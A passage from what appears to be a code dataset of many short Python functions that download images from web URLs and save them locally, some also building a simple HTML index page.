\n\t\t\t# We need to do this to slugify the file name and avoid errors when loading images\n\t\t\tfile_name, file_extension = os.path.splitext(im['url'])\n\t\t\tfile_name = file_name.split(\"/\")[-1]\n\n\t\t\tfile_path = self.data_path + self.dataset + \"/\" + im['slug'] + '/' + str(im['id']) + '_' + slugify(file_name) + file_extension\n\n\t\t\t# If file is not in the file path, then download from the url\n\t\t\tif not os.path.exists(file_path):\n\t\t\t\ttry:\n\t\t\t\t\turllib.urlretrieve(im['url'], file_path )\n\t\t\t\t\tprint \"i:{} url:{}\".format(i,im['url'])\n\t\t\t\texcept Exception, e:\n\t\t\t\t\tprint e\n\t\t\ti += 1", "def download_images(src_dir, dest_dir):\n # +++your code here+++\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n res=utility(src_dir)\n k=0\n f=file(dest_dir+\"/\"+\"index.html\", 'w')\n f.write(\"<html><body>\")\n for i in res:\n local_name='image'+str(k)\n print \"downloading image%d\" %(k)\n urllib.urlretrieve(i, os.path.join(dest_dir, local_name))\n f.write(\"<img src=\"+'\"'+os.path.join(dest_dir, local_name)+'\"'+\">\")\n k+=1\n f.write(\"</body></html>\")\n f.close()\n cmd=\"xdg-open\"+\" \"+'\"'+dest_dir+\"/\"+\"index.html\"+'\"'\n (status, output)=commands.getstatusoutput(cmd)\n sys.exit(1)", "def download(query, destination='', max_items=None):\n destination = os.path.join(destination, query)\n eol_id = search(query)\n urls = []\n for idx, url in enumerate(get_images(eol_id)):\n filepath = os.path.join(destination, str(idx))\n data.download_image(url, filepath)\n print(idx)\n if max_items and idx >= max_items:\n break", "def downloadMinio(url_list,list_d):\n print(\"You are downloading {} images\".format(parser_arguments().limit),end=\" \");print(\"of {} class.\".format(parser_arguments().classes))\n print(\"Please, be patient :)\")\n name = \"-\".join(parser_arguments().classes)\n name = name.lower()\n for i in range(len(url_list)):\n filename= url_list[i].split(\"/\")[-1] # name of the picture file\n r = requests.get(url_list[i], stream =True)\n\n\n if r.status_code == 200:\n r.raw.decode_content = True\n\n with open(filename,'wb') as f : # create the file locally in binary-write mode\n metadata = list_d[i]\n r = requests.get(url_list[i], stream =True)\n shutil.copyfileobj(r.raw, f) #write our image to the file\n path = os.getcwd()+'/'+filename # image path\n minioClient.fput_object(name,filename,path,'image/jpg',metadata)\n os.remove(filename)\n print(filename,'have been successfuly uploaded')\n print('Done!')", "def download_images(keyword, limit = 1):\n #creating list of arguments\n arguments = {\"keywords\": keyword ,\n \"limit\": limit , \n \"print_urls\": False,\n \"output_directory\": OUT_DIR} \n\n # Pass the arguments to above function and download images\n paths = response.download(arguments)", "async def dl_image(url, filename):\n\ttry:\n\t\twith aiohttp.ClientSession() as session:\n\t\t\tasync with session.get(url) as resp:\n\t\t\t\ttest = await resp.read()\n\t\t\t\twith open('data/tmp/'+filename.lower(), \"wb\") as f:\n\t\t\t\t\tf.write(test)\n\t\t\t\treturn 0\n\texcept Exception as e:\n\t\tprint('[!ERROR!] 
in Get image')\n\t\tprint(e)\n\t\treturn -1", "def download_images_jpg(self):\n self.show_as_waiting(True)\n self.download_images('JPEG')\n self.show_as_waiting(False)", "def download(word, n_images=100):\n\n # Fields for pixbay from https://pixabay.com/api/docs/#api_search_images\n\n http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())\n\n for i in range(5):\n fields = {\n \"key\": _(s.__secret__, egg_open()),\n \"q\": word,\n \"image_type\": \"photo\",\n \"safesearch\": \"true\",\n \"per_page\": max(3, min(200, n_images + i))\n }\n\n debug_log(f\"fields for request:\\n{ {key: fields[key] for key in fields.keys() if key != 'key'} }\")\n\n r = http.request(method='GET',\n url='https://pixabay.com/api/',\n fields=fields)\n\n debug_log(f\"Response data: {r.data}\")\n\n if \"ERROR\" in str(r.data, 'utf-8'):\n continue\n else:\n break\n\n try:\n data = json.loads(r.data.decode('utf-8'))\n except json.decoder.JSONDecodeError as e:\n warnings.warn(\"Cannot download '{word}'. Bad response: {response}\".format(\n word=word,\n response=str(r.data, 'utf-8')\n ))\n return False\n\n image_urls = [item[\"largeImageURL\"] for item in data[\"hits\"]]\n image_ids = [item[\"id\"] for item in data[\"hits\"]]\n\n\n debug_log(f\"Image urls: {image_urls}\")\n debug_log(f\"Len Image urls: {len(image_urls)}\")\n\n save_dir = os.path.join(s.__STEP_1_CACHE_DIR__, word)\n os.makedirs(save_dir, exist_ok=True)\n\n if len(image_urls) < n_images:\n warnings.warn(\"Not enough images for {word}. Only {len_image_urls} instead of {n_images}.\".format(\n word=word,\n len_image_urls=len(image_urls),\n n_images=n_images\n ))\n open(os.path.join(save_dir, \"SATURATED\"), 'w').close()\n open(os.path.join(save_dir, \"DO_NOT_DELETE\"), 'w').close()\n\n image_paths = [get_unique_save_path_name(save_dir,\n im_id,\n im_url.split('.')[-1]) # Get the right image extension\n for im_id, im_url in zip(image_ids, image_urls)]\n\n debug_log(f\"Image paths: {image_paths}\")\n\n for i, im_url, im_path in zip(range(len(image_urls)), image_urls, image_paths):\n debug_log(f\"Downloading '{word}' image [{i+1}/{len(image_urls)}]: {im_url}\")\n save_file(im_url, im_path, http)\n debug_log(f\"Done! 
Saved as {im_path}\")\n\n return True", "def download_images(links):\n\n for link in links:\n print(\"Processing\", link)\n try:\n response = requests.get(link,\n timeout=METADATA_REQUEST_TIMEOUT, stream=True)\n except requests.exceptions.RequestException as e:\n print(e)\n sys.exit(1)\n\n artist_name = link.rsplit('/', 2)[1]\n image_name = link.rsplit('/', 2)[2]\n image_name = artist_name + image_name\n\n file_location = ASSET_PATH.joinpath(image_name)\n\n with open(str(file_location), 'wb') as outfile:\n shutil.copyfileobj(response.raw, outfile)", "def download_img(self, url, output):\n try:\n print(\"Downloading from: %s\" % url)\n with open(output, 'wb') as f:\n f.write(urllib2.urlopen(url).read())\n print(\"Wrote to: %s\" % output)\n except IOError, e:\n print(e)", "def getimgs():", "def get_image(self, index):\r\n \r\n # Get request to get all the links for all exercises\r\n image = requests.get(API.url_image, headers = self.headers).json()\r\n filename = download(image[index]['image'])", "def download_imgs(img_urls, outfolder):\n \n print \"Downloading %d images from: \" %len(img_urls), url\n \n for image in img_urls:\n filename = image.split('/')[-1]\n outpath = os.path.join(outfolder, filename)\n img_url = urljoin(url, image)\n try:\n urlretrieve(image, outpath)\n print img_url, \"downloaded successfully.\"\n \n except IOError:\n print \"Failed to download file:\", img_url\n pass", "def download_card_images(self, card_names, lang=\"en\"):\n for card_name in card_names:\n print(\"Dowloading card imgs for \\'\" + card_name + \"\\' (\" + lang + \")\")\n output_file_name = card_name + \".jpg\"\n output_file_path = IoManager.CARD_IMAGES_PATH_EN + \"/\" + output_file_name if lang == \"en\" else IoManager.CARD_IMAGES_PATH_FR + \"/\" + output_file_name\n output_file_path = output_file_path.replace('//', '__')\n en_url, fr_url = self.get_card_urls(card_name)\n url = en_url if lang == \"en\" else fr_url\n # Open the url image, set stream to True, this will return the stream content.\n resp = requests.get(url, stream=True)\n # Open a local file with wb ( write binary ) permission.\n local_file = open(output_file_path, 'wb')\n # Set decode_content value to True, otherwise the downloaded image file's size will be zero.\n resp.raw.decode_content = True\n # Copy the response stream raw data to local image file.\n shutil.copyfileobj(resp.raw, local_file)\n # Remove the image url response object.\n del resp", "def regular_download(self) -> NoReturn:\n\n if not path.isdir(self.name):\n mkdir(self.name)\n\n for chapter in self.chapters.keys():\n\n chapter_folder = f\"{self.name}/{chapter}/\"\n curr_chapter = self.chapters[chapter]\n base_url = f\"{curr_chapter['server']}{curr_chapter['hash']}/\"\n\n if not path.isdir(chapter_folder):\n mkdir(chapter_folder)\n\n for image in curr_chapter[\"images\"]:\n\n image_url = f\"{base_url}{image}\"\n image_file = f\"{chapter_folder}{image}\"\n response = requests.get(image_url, headers={\"Connection\":\"close\"})\n\n if response and response.status_code == 200:\n with open(image_file, \"wb\") as img_file:\n img_file.write(response.content)\n else:\n print(f\"Error downloading chapter: {curr_chapter['num']} Image: {image}\")", "async def save_url_images(images):\n for source, image in images:\n name = source.split('/')[-1]\n async with aiofiles.open(f'{OUTPUT_FOLDER}/{name}', 'wb') as f:\n await f.write(image)", "def download_images(urlList):\n fileNumber = 1;\n fileName = \"\"\n\n # urlList[0] is just titles, so we start at 1\n for url in urlList[1:]:\n 
sys.stdout.write(\"\\rFile number %i of %i \" % (fileNumber+1, len(urlList)))\n\n sys.stdout.flush()\n\n try:\n fileName = str(fileNumber) + \".png\"\n # Download the file from `url` and save it locally under `fileName`:\n # I append png to the end of the file to \"make it\" png, but there's definitely a better way\n with urllib.request.urlopen(url) as response, open(fileName, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n except urllib.error.HTTPError:\n sys.stdout.flush()\n print(\"\\r %s is not a downloadable image. Skipping to next url...\" % url)\n \n fileNumber += 1;\n\n sys.stdout.write(\"\\r\\nDone!\")\n sys.stdout.flush()\n sys.stdout.write(\"\\r\\n\")", "def download_images(img_urls, dest_dir):\n # +++your code here+++\n (errcode, statusmsg) = check_create_dir(dest_dir)\n if errcode:\n print statusmsg\n sys.exit(errcode)\n else: print statusmsg\n # retrieve images and generate html code for files\n html_str = '<html>\\n<body>\\n' # opening html file tags\n i = 0\n for img in img_urls:\n img_filename = 'img' + str(i)\n full_filepath = os.path.join(dest_dir, img_filename) \n print 'Retrievieng ' + img + ' to ' + full_filepath + ' file..'\n urllib.urlretrieve(img, full_filepath)\n html_str += '<img src=\\\"' + img_filename + '\\\">'\n i += 1\n html_str += '\\n</html>\\n</body>' # closing html file tags\n # create html file\n html_filename = os.path.join(dest_dir, 'index.html')\n f = open(html_filename, 'w')\n f.write(html_str) \n f.close()\n print 'File ' + html_filename + ' was created.'", "def downloader(urls, path):\n counter = 1\n for media_file in urls:\n # Create the file name\n file_name = \"meme\" + str(counter) + \".jpg\"\n file_location = path + \"/\" + file_name\n print(f\"Downloading {media_file} as {file_name}.\")\n # Overwrite files\n if os.path.exists(file_location):\n os.remove(file_location)\n print(f\"{file_name} will overwrite an existing file of the same name.\")\n wget.download(media_file, out=file_location)\n print(\"\\n\")\n counter += 1\n print(f\"{counter - 1} items were downloaded.\")\n return counter - 1", "def download_photos(urls, folder=''):\n folder_path = os.path.join('photos', folder)\n if not os.path.exists(folder_path):\n os.mkdir(folder_path)\n for url in urls:\n image = requests.get(url)\n filename = os.path.join(folder_path, url.split('/')[-1])\n with open(filename, 'wb') as f:\n f.write(image.content)", "def download_images(main_keyword, supplemented_keywords, download_dir): \n image_links = set()\n print('Process {0} Main keyword: {1}'.format(os.getpid(), main_keyword))\n\n # create a directory for a main keyword\n img_dir = download_dir + main_keyword + '/'\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n for j in range(len(supplemented_keywords)):\n print('Process {0} supplemented keyword: {1}'.format(os.getpid(), supplemented_keywords[j]))\n search_query = quote(main_keyword + ' ' + supplemented_keywords[j])\n # url = 'https://www.google.com/search?q=' + search_query + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'\n url = 'https://www.google.com/search?q=' + search_query + '&source=lnms&tbm=isch'\n image_links = image_links.union(parse_page(url))\n print('Process {0} get {1} links so far'.format(os.getpid(), len(image_links)))\n time.sleep(2)\n print (\"Process {0} get totally {1} links\".format(os.getpid(), len(image_links)))\n\n print (\"Start downloading...\")\n count = 1\n for link in image_links:\n try:\n req = urllib.request.Request(link, headers = 
{\"User-Agent\": generate_user_agent()})\n response = urllib.request.urlopen(req)\n data = response.read()\n file_path = img_dir + '{0}.jpg'.format(count)\n with open(file_path,'wb') as wf:\n wf.write(data)\n print('Process {0} fininsh image {1}/{2}.jpg'.format(os.getpid(), main_keyword, count))\n count += 1\n except urllib.error.URLError as e:\n logging.error('URLError while downloading image {0}\\nreason:{1}'.format(link, e.reason))\n continue\n except urllib.error.HTTPError as e:\n logging.error('HTTPError while downloading image {0}\\nhttp code {1}, reason:{2}'.format(link, e.code, e.reason))\n continue\n except Exception as e:\n logging.error('Unexpeted error while downloading image {0}\\nerror type:{1}, args:{2}'.format(link, type(e), e.args))\n continue\n\n print(\"Finish downloading, total {0} errors\".format(len(image_links) - count))", "def download(subreddits):\r\n print(subreddits)\r\n pic_urls = get_urls.reddit_pics(subreddits, PAGES, SORTING, TIME_PERIOD)\r\n image_downloader.check_folder(FOLDER_PATH)\r\n image_downloader.download_pics(pic_urls, FOLDER_PATH)", "def download_images(pages):\n try:\n pool = Pool(conf.MAX_PROCESS)\n pool.map_async(get_image_from_page, pages)\n pool.close()\n pool.join()\n except:\n pool.close()\n pool.join()", "def download_images_png(self):\n self.show_as_waiting(True)\n self.download_images('PNG')\n self.show_as_waiting(False)", "def download_dilbert(s, u):\n with open(\"comicfile.jpg\", \"wb\") as file:\n response = s.get(u)\n file.write(response.content)", "def download_images(image_urls):\n fetched = []\n count = 0\n for img_url in image_urls:\n if not db.is_image_in_db(img_url):\n filename = os.path.basename(img_url)\n if not os.path.exists(cfg.PHOTO_DIR + filename):\n referer_string = web.get_referrer_string(img_url) # to trick 4walled.org\n cmd = \"wget -t {retry_count} -T {timeout} {ref} {url} -O {save}\".format(url=img_url,\n save=os.path.join(cfg.PHOTO_DIR, filename),\n ref=referer_string,\n retry_count=cfg.WGET_RET,\n timeout=cfg.WGET_TIMEOUT)\n print cmd\n os.system(cmd)\n fetched.append(img_url)\n count += 1\n else:\n print(\"# {0} was already fetched once...\".format(img_url))\n\n print(\"# new imgage(s): {0}\".format(count))\n return fetched", "def do_get_image_sequence():\n sequence_range = 1000000000\n try:\n n = int(request.args.get(\"n\", 1))\n except (TypeError, ValueError):\n return abort(400)\n\n rv = {\n \"sequence_list\": [\n i % sequence_range\n for i in sequence_values(image_sequence, n)\n ]\n }\n\n if n == 1:\n rv[\"sequence_no\"] = rv[\"sequence_list\"][0]\n\n return jsonify(rv)", "def download_pics(pic_urls, directory):\r\n print(\"downloading pictures...\")\r\n for url in pic_urls:\r\n name = url.split(\"/\")[-1]\r\n if len(name) >= 20:\r\n name = name[len(name)-20:]\r\n \r\n print('from:', url)\r\n pic_path = directory + name\r\n if not os.path.exists(pic_path):\r\n print(\"downloading ->\", pic_path)\r\n try:\r\n urllib.request.urlretrieve(url, pic_path)\r\n except ValueError:\r\n # 'http://' missing from link\r\n urllib.request.urlretrieve(\"http://\" + url, pic_path)\r\n except urllib.error.HTTPError:\r\n # access forbidden\r\n # ex: http://puu.sh/n2zPL/2491975ef3.jpg\r\n print(\"URL skipped due to HTTPError\", url)\r\n else:\r\n print(\"already downloaded ->\", pic_path)\r\n print(\"Downloads Finished\")", "def _download_images(self, image_urls: typing.List[str], save_dir: str) -> typing.List[str]:\n\n\t\timage_paths = []\n\n\t\tfor i, url in enumerate(image_urls):\n\t\t\timage = 
self.send_request_image(url)\n\n\t\t\timage_ext = url.split(\".\")[-1]\n\n\t\t\timage_dst_path = os.path.join(save_dir, f\"{i}.{image_ext}\")\n\n\t\t\tif image is not None:\n\t\t\t\twith open(image_dst_path, \"wb\") as fh:\n\n\t\t\t\t\t# Magic boolean which makes it work\n\t\t\t\t\timage.raw.decode_content = True\n\n\t\t\t\t\t# noinspection PyBroadException\n\n\t\t\t\t\t# Attempt to download the image from the URL\n\t\t\t\t\ttry:\n\t\t\t\t\t\tshutil.copyfileobj(image.raw, fh)\n\n\t\t\t\t\t# We should reduce the scope\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tpass\n\n\t\t\t\t\t# We downloaded the image without any errors\n\t\t\t\t\telse:\n\t\t\t\t\t\timage_paths.append(image_dst_path)\n\n\t\treturn image_paths", "def download_img(url,name):\n resp = download(url)\n if (resp!=None):\n image = np.asarray(bytearray(resp), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n cv2.imwrite(name,image)\n return", "def download(url, out_folder):\n \n filename = \"2.png\"\n \n outpath = os.path.join(out_folder, filename)\n \n if url.lower().startswith(\"http\"):\n urlretrieve(url, outpath)\n else:\n urlretrieve(urlparse.urlunparse(parsed), outpath)", "def download(self):\n\n if not self.plateifu:\n return None\n\n plate, ifu = self.plateifu.split('-')\n dir3d = self._get_image_dir()\n\n name = 'mangaimage'\n\n return super(Image, self).download(name, ifu=ifu, dir3d=dir3d,\n drpver=self._drpver, plate=plate)", "def help_download_file():\n global picture_lst\n picture_lst = [\"test/download1.png\", \"test/download2.png\", \"test/download3.png\", \"test/download4.png\",\n \"test/download5.png\", \"test/download6.png\", \"test/download7.png\", \"test/download8.png\",\n \"test/download9.png\", \"test/download10.png\", \"test/download11.png\", \"test/download12.png\",\n \"test/download13.png\"]\n help_main()", "def download_files(self):", "def get_image_url(pixid, imgInfoPool, multiAutocheck=0, timeout=10):\n\n # open the page\n try:\n r = requests.get(operate_url, params=dict(mode='medium', illust_id=pixid), cookies=mycookies)\n except ConnectionError:\n print('I cannot open the page. Maybe the id is invalid?')\n return 1\n\n soup = bs4.BeautifulSoup(r.text.encode('utf-8'), 'html.parser')\n img = soup.find('img', class_='original-image')\n if not img: # multiple images, or error\n if multiAutocheck == 2: # silence\n return None\n\n try:\n r = requests.get(operate_url, params=dict(mode='manga', illust_id=pixid), cookies=mycookies)\n except ConnectionError: # it's error\n print('I cannot open the page. Maybe the id is invalid?')\n return 1\n else: # it's multiple images\n soup = bs4.BeautifulSoup(r.text.encode('utf-8'), 'html.parser')\n imgNumber = len(soup.find_all('div', class_='item-container'))\n if imgNumber == 0:\n print('Cannot find pictures in the page. Please try again?')\n print('Url is ' + r.url)\n return 1\n\n if multiAutocheck == 1:\n imgIndex = 'a'\n elif multiAutocheck == 0:\n imgIndex = input('Illustration ' + str(pixid) + ' has ' + str(\n imgNumber) + ' pictures. 
Download all (a) or index: (number)')\n\n if imgIndex == 'a':\n for i in range(0, imgNumber):\n result2 = get_image_url2(pixid, i, imgInfoPool)\n if result2:\n return result2\n else:\n result2 = get_image_url2(pixid, int(imgIndex), imgInfoPool)\n if result2:\n return result2\n\n else: # one image\n imgName = img.attrs.get('alt')\n imgInfoPool.append(dict(id=pixid, name=imgName, url=img.attrs.get('data-src'), pageurl=r.url))\n return", "def download_single(data):\n url = data[0]\n image_id = data[1]\n target_path = data[2]\n\n if os.path.exists(target_path):\n return\n\n try:\n response = requests.get(url, timeout=30)\n response.raise_for_status()\n except:\n LOGGER.warning('Failed to fetch url %s (id=%d)', url, image_id)\n return\n\n try:\n content = response.content\n image = Image.open(BytesIO(content))\n except:\n LOGGER.warning('Failed to capture image at url %s (id=%d)', url, image_id)\n return\n\n if not image.format == 'JPEG':\n try:\n image = image.convert('RGB')\n except:\n logging.warning('Failed to convert RGB, %s (id=%d)', url, image_id)\n return\n\n try:\n image.save(target_path, format='JPEG', quality=100)\n except:\n LOGGER.warning('Failed to save url %s (id=%d)', url, image_id)\n return\n\n return", "def get_images(outputdir, parent_key, key, searchurl, maximum, json_path):\n body, browser = build_browser(searchurl)\n\n urls = []\n\n while len(urls) < maximum:\n try:\n page_source = browser.page_source\n\n soup = BeautifulSoup(page_source, 'lxml')\n\n search_result_soup = get_div_child(soup.body, \"islrg\")\n images = search_result_soup.find_all('img')\n urls = get_url_from_images(images)\n print(urls)\n\n for i in range(50):\n scroll_down(body)\n # browser.find_element_by_xpath('//*[@id=\"islmp\"]/div/div/div/div')\n browser.find_element_by_class_name(\"mye4qd\").click()\n print(len(urls) < maximum)\n except ElementNotInteractableException as e: # There is no next page\n print(e)\n break\n\n\n\n if not os.path.exists(outputdir):\n os.makedirs(outputdir)\n\n write_urls(json_path, parent_key, key, urls)\n\n # download_urls(urls, outputdir)\n browser.close()", "def download_pictures(recent_seach_tweets):\n # Downloading pictures\n print('%s - Downloading %d tweets' % (datetime.datetime.now().strftime('%d/%m/%Y - %H:%M'), len(recent_seach_tweets)))\n for tw in recent_seach_tweets:\n img_url = tw['images'][0]\n filename = tw['text'][:tw['text'].index(\"#\")-1].lower().replace(' ','_')\n filename = \"./downloaded_pics/%s.jpg\" % filename\n urllib.request.urlretrieve(img_url, filename)", "def get_image_qm(html_src, todir):\n #print url\n\n img_url, title = img_details(html_src)\n \n r = requests.get(img_url)\n with open(todir+title+'.jpg','wb') as f:\n f.write(r.content)", "def get_images(self, page_number):", "def get_image(url, path):\n r = requests.get(url, stream=True)\n if r.status_code == 200:\n with open(path, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n print(\"[>] get\", url, \">>\", path)\n f.close()", "def download_images_from_metadatas(metadatas):\n ptf_images = []\n for metadata in metadatas:\n url = os.path.join(IPAC_DATA_URL, metadata[\"pfilename\"])\n ptf_images.append(PTFImage(retrieve_ipac_file(url), metadata=metadata))\n print greenText(\"Image {} downloaded.\".format(os.path.basename(metadata[\"pfilename\"])))\n \n return ptf_images", "def download_images(img_urls, dest_dir):\n if not os.path.exists(dest_dir):\n # If the directory doesn't exist, create it\n os.mkdir(dest_dir)\n count = 0\n img_string = ''\n # Copies each file from 
the url provided to the directory provided\n for file in img_urls:\n new_filename = '{}/img{}.jpg'.format(dest_dir, count)\n print \"Retrieving {}\".format(file)\n urllib.urlretrieve(file, new_filename)\n img_string += \"<img src = 'img{}.jpg'>\".format(count)\n count += 1\n print \"Retrieved {} files\".format(count)\n # Creates an html file to display the completed image\n with open('{}/index.html'.format(dest_dir), 'w') as f:\n f.write(\n '<html>\\n<body>\\n{}\\n</body>\\n</html>'.format(img_string)\n )\n pass", "def read_from_server(url_base=\"http://10.200.102.18/\", url_dir=\"G179-dataset/\"):\n\n all_images = urllib2.urlopen(url_base + url_dir).read()\n\n parser = ImagesHTMLParser()\n parser.feed(all_images)\n data = parser.data\n imgs = []\n\n print(\"Found %d images!\" % len(data))\n print(\"Started Download!\")\n i = 1\n\n for d in data:\n print(\"\\rProgress: %d/%d \" % (i, len(data)), end='')\n dl_img = urllib2.urlopen(url_base + url_dir + d).read()\n asd = cStringIO.StringIO(dl_img)\n img = Image.open(asd)\n imgs.append(np.array(img))\n i = i + 1\n\n return imgs", "def download_image_from(link, directory, name):\n try:\n img_content = requests.get(link).content\n image_file = io.BytesIO(img_content)\n image = Image.open(image_file).convert('RGB')\n image.save(f'./{directory}/{name}.png', 'PNG', quality=100, subsampling=0)\n except:\n pass", "def download_images(img_urls, dest_dir):\n # Creating the directory if the directory does not already exist\n if not os.path.exists(str(dest_dir)):\n os.mkdir(dest_dir)\n print ('Retrieving...')\n with open(str(dest_dir) + '/index.html', 'w') as f:\n f.write(\"<html>\\n<body>\\n\")\n for index, url in enumerate(img_urls):\n img_name = 'img' + str(index + 1)\n urllib.urlretrieve(\"https://code.google.com\" + url, filename=str(dest_dir) + '/'\n + img_name +'.jpg')\n print ('Downloaded ' + url[-10:] + \": \" + \\\n str(index + 1) + \" images downloaded\")\n\n f.write(\"<img src=\" + '\"' + img_name +\".jpg\" +'\">')\n f.write(\"\\n</html>\\n</body>\")\n print ('Download Complete!')\n pass", "def dl_image(img_name, img_url):\n path = os.path.join(base_path, img_name)\n res = requests.get(img_url)\n with open(path, 'wb') as fout:\n fout.write(res.content)", "def auto_download(dataDir, dataType, dataYear):\n\n # Setup paths and file names\n if dataType == \"minival\" or dataType == \"valminusminival\":\n imgDir = \"{}/{}{}\".format(dataDir, \"val\", dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, \"val\", dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(\"val\", dataYear)\n else:\n imgDir = \"{}/{}{}\".format(dataDir, dataType, dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, dataType, dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(dataType, dataYear)\n # print(\"Image paths:\"); print(imgDir); print(imgZipFile); print(imgURL)\n\n # Create main folder if it doesn't exist yet\n if not os.path.exists(dataDir):\n os.makedirs(dataDir)\n\n # Download images if not available locally\n if not os.path.exists(imgDir):\n os.makedirs(imgDir)\n print(\"Downloading images to \" + imgZipFile + \" ...\")\n with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + imgZipFile)\n with zipfile.ZipFile(imgZipFile, \"r\") as zip_ref:\n zip_ref.extractall(dataDir)\n print(\"... 
done unzipping\")\n print(\"Will use images in \" + imgDir)\n\n # Setup annotations data paths\n annDir = \"{}/annotations\".format(dataDir)\n if dataType == \"minival\":\n annZipFile = \"{}/instances_minival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_minival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0\"\n unZipDir = annDir\n elif dataType == \"valminusminival\":\n annZipFile = \"{}/instances_valminusminival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_valminusminival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0\"\n unZipDir = annDir\n else:\n annZipFile = \"{}/annotations_trainval{}.zip\".format(dataDir, dataYear)\n annFile = \"{}/instances_{}{}.json\".format(annDir, dataType, dataYear)\n annURL = \"http://images.cocodataset.org/annotations/annotations_trainval{}.zip\".format(dataYear)\n unZipDir = dataDir\n # print(\"Annotations paths:\"); print(annDir); print(annFile); print(annZipFile); print(annURL)\n\n # Download annotations if not available locally\n if not os.path.exists(annDir):\n os.makedirs(annDir)\n if not os.path.exists(annFile):\n if not os.path.exists(annZipFile):\n print(\"Downloading zipped annotations to \" + annZipFile + \" ...\")\n with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + annZipFile)\n with zipfile.ZipFile(annZipFile, \"r\") as zip_ref:\n zip_ref.extractall(unZipDir)\n print(\"... done unzipping\")\n print(\"Will use annotations in \" + annFile)", "def download_rna_seq(rna_seq_uuid_list, dirpath):\n data_dict = {}\n data_dict[\"ids\"] = rna_seq_uuid_list\n\n headers = {'Content-Type': 'application/json'}\n data = json.dumps(data_dict)\n\n try:\n response = requests.post('https://api.gdc.cancer.gov/data', headers=headers, data=data)\n filename = os.path.join(dirpath,response.headers[\"Content-Disposition\"].split(\"filename=\")[1])\n\n with open(filename, \"wb\") as file:\n file.write(response.content)\n file.close()\n return filename\n except:\n return None", "def download_img_and_save(url, path):\n import requests\n a = url.find(\"UW-EauClaireCOVID-19DataTrackerDashboard\")\n b = len(url)\n fn = url[a:b].replace('/','_')\n fn = '{}/{}'.format(path,fn)\n with open(fn, \"wb\") as f:\n f.write(requests.get(url).content)", "async def get_url_images(session, url):\n content = await get_page(session, url)\n if not content:\n return []\n soup = BeautifulSoup(content, features=\"html.parser\")\n image_sources = [img['src'] for img in soup.find_all('img')]\n image_sources_fixed = [f'https:{source}' if 'https:' not in source else source for source in image_sources]\n images = []\n for source in image_sources_fixed:\n image = await get_image(session, source)\n if image:\n images.append((source, image))\n\n return images", "def create_image_urls(self):\n self._image_urls = []\n while True:\n image_url = self._create_random_url()\n request = urllib2.Request(image_url)\n opener = urllib2.build_opener(NoRedirection)\n try:\n response = opener.open(request)\n code = response.code\n except urllib2.HTTPError as error:\n code = error.code\n if code == 200:\n print \"Found a successful url!\"\n self._image_urls.append(image_url)\n if len(self._image_urls) > 100:\n break\n print self._image_urls\n image_url_file = open(self._image_urls_file_name, 'w')\n for image_url 
in self._image_urls:\n image_url_file.write(image_url + '\\n')\n image_url_file.close()", "def getNextImage(self):\n self._images = self._api.updateImageNames()\n \n # Get index from local txt file. \n # This ensures that the image queue does not reset if the Pola restarts.\n try: \n f = open(\"memoryIndex.txt\", 'r')\n self._currentIndex = int((f.read()))\n f.close()\n except: \n self._currentIndex = -1\n \n self._currentIndex = (self._currentIndex + 1) % len(self._images)\n \n f = open(\"memoryIndex.txt\", 'w')\n f.write(str(self._currentIndex))\n f.close()\n \n \n # If there is an internet connection, go online. If not, get the \"no wifi error\"- image queue\n try:\n urllib.request.urlopen('http://torabodin.com/')\n try: \n imageName = self._api.downloadImage(self._currentIndex)\n print(1, imageName)\n self._image= self.loadImage(imageName, True)\n print (self._image)\n \n except: \n self._image = self.getNextImage()\n \n except:\n self._image = self.loadImage(None, False)\n \n \n return self._image", "def download(self):\n\n # os.open *should* give a thread-safe way to exlusivly open files\n filepath = self.film\n try:\n # os.O_BINARY is only avilable and needed on windows\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY | os.O_BINARY\n except:\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY\n try:\n fd = os.open(filepath, flags)\n except:\n return\n\n try:\n response = self.session.get(self.filmurl, stream=True)\n if response.status_code == 200:\n for chunk in response.iter_content(1024):\n os.write(fd, chunk)\n except:\n # Remove partial img file if request or stream fails\n os.close(fd)\n os.remove(filepath)", "def download_content(content_link, output_dir):\n if content_link is None: return None\n res = requests.get(content_link, stream=True)\n try:\n res.raise_for_status()\n except requests.exceptions.HTTPError:\n return None\n img_name, img_format = parse_image_url(res.url)\n filepath = '{}/{}.{}'.format(output_dir, img_name, img_format)\n\n with open(filepath, mode='wb') as image_file:\n for chunk in res.iter_content(chunk_size=chunk_size):\n image_file.write(chunk)\n\n return abspath(filepath)", "def download_image(url, filename):\n r = requests.get(url)\n open(filename, 'wb').write(r.content)", "def download_images(img_urls, dest_dir):\n if len(img_urls) > 0 :\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n # save each images file name\n image_names = []\n # Iterate over each image url, downloading the image to a local file\n img_ctr = 0\n for url in img_urls :\n file_name = 'img' + str(img_ctr) + '.jpg'\n image_names.append(file_name)\n full_name = dest_dir + '/' + file_name\n print('Writing file: %s from %s' 